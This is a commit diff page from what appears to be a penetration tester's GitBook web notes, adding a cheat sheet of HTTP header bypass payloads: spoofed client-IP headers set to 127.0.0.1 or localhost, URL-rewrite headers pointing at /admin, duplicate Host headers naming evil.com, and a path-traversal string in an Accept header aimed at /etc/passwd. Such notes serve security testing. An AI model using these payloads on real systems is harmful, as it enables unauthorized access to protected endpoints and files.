Skip to content

Commit f327b09

Browse files
zweilosecgitbook-bot
authored andcommitted
GitBook: [master] one page modified
1 parent e5796ed commit f327b09

File tree

1 file changed

+105
-5
lines changed

1 file changed

+105
-5
lines changed

web/web-notes/README.md

Lines changed: 105 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -210,11 +210,7 @@ finger batman@$ip
210210
nikto -useproxy http://$ip:3128 -h $ip
211211
```
212212

213-
### Cookies
214-
215-
* [https://cookiepedia.co.uk/](https://cookiepedia.co.uk/)
216-
* "Largest Database of Pre-Categorized Cookies"
217-
* Scans a website for cookie usage
213+
## Headers
218214

219215
### HTTP Authorization headers
220216

@@ -257,6 +253,110 @@ Authorization: AWS4-HMAC-SHA256 Credential=abc/20200618/us-east-1/execute-api/aw
257253
* [https://www.netsparker.com/whitepaper-http-security-headers/](https://www.netsparker.com/whitepaper-http-security-headers/)
258254
* [https://owasp.org/www-project-secure-headers/](https://owasp.org/www-project-secure-headers/)
259255

256+
### Header Bypass Methods
257+
258+
```bash
259+
# Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
260+
Client-IP:
261+
Connection:
262+
Contact:
263+
Forwarded:
264+
From:
265+
Host:
266+
Origin:
267+
Referer:
268+
True-Client-IP:
269+
X-Client-IP:
270+
X-Custom-IP-Authorization:
271+
X-Forward-For:
272+
X-Forwarded-For:
273+
X-Forwarded-Host:
274+
X-Forwarded-Server:
275+
X-Host:
276+
X-Original-URL:
277+
X-Originating-IP:
278+
X-Real-IP:
279+
X-Remote-Addr:
280+
X-Remote-IP:
281+
X-Rewrite-URL:
282+
X-Wap-Profile:
283+
284+
# Try to repeat same Host header 2 times
285+
Host: legit.com
286+
Stuff: stuff
287+
Host: evil.com
288+
289+
# Bypass type limit
290+
Accept: application/json, text/javascript, */*; q=0.01
291+
Accept: ../../../../../../../../../etc/passwd{{'
292+
293+
# Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the host header
294+
295+
# 401/403 bypasses
296+
# Whitelisted IP 127.0.0.1 or localhost
297+
Client-IP: 127.0.0.1
298+
Forwarded-For-Ip: 127.0.0.1
299+
Forwarded-For: 127.0.0.1
300+
Forwarded-For: localhost
301+
Forwarded: 127.0.0.1
302+
Forwarded: localhost
303+
True-Client-IP: 127.0.0.1
304+
X-Client-IP: 127.0.0.1
305+
X-Custom-IP-Authorization: 127.0.0.1
306+
X-Forward-For: 127.0.0.1
307+
X-Forward: 127.0.0.1
308+
X-Forward: localhost
309+
X-Forwarded-By: 127.0.0.1
310+
X-Forwarded-By: localhost
311+
X-Forwarded-For-Original: 127.0.0.1
312+
X-Forwarded-For-Original: localhost
313+
X-Forwarded-For: 127.0.0.1
314+
X-Forwarded-For: localhost
315+
X-Forwarded-Server: 127.0.0.1
316+
X-Forwarded-Server: localhost
317+
X-Forwarded: 127.0.0.1
318+
X-Forwarded: localhost
319+
X-Forwared-Host: 127.0.0.1
320+
X-Forwared-Host: localhost
321+
X-Host: 127.0.0.1
322+
X-Host: localhost
323+
X-HTTP-Host-Override: 127.0.0.1
324+
X-Originating-IP: 127.0.0.1
325+
X-Real-IP: 127.0.0.1
326+
X-Remote-Addr: 127.0.0.1
327+
X-Remote-Addr: localhost
328+
X-Remote-IP: 127.0.0.1
329+
330+
# Fake Origin - make GET request to accesible endpoint with:
331+
X-Original-URL: /admin
332+
X-Override-URL: /admin
333+
X-Rewrite-URL: /admin
334+
Referer: /admin
335+
# Also try with absolute url https:/domain.com/admin
336+
337+
# Method Override
338+
X-HTTP-Method-Override: PUT
339+
340+
# Provide full path GET
341+
GET https://vulnerable-website.com/ HTTP/1.1
342+
Host: evil-website.com
343+
344+
# Add line wrapping
345+
GET /index.php HTTP/1.1
346+
Host: vulnerable-website.com
347+
Host: evil-website.com
348+
349+
# Wordlists
350+
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
351+
https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers
352+
```
353+
354+
## Cookies
355+
356+
* [https://cookiepedia.co.uk/](https://cookiepedia.co.uk/)
357+
* "Largest Database of Pre-Categorized Cookies"
358+
* Scans a website for cookie usage
359+
260360
## OpenVAS Vulnerability Scanner
261361
262362
```bash

0 commit comments

Comments
 (0)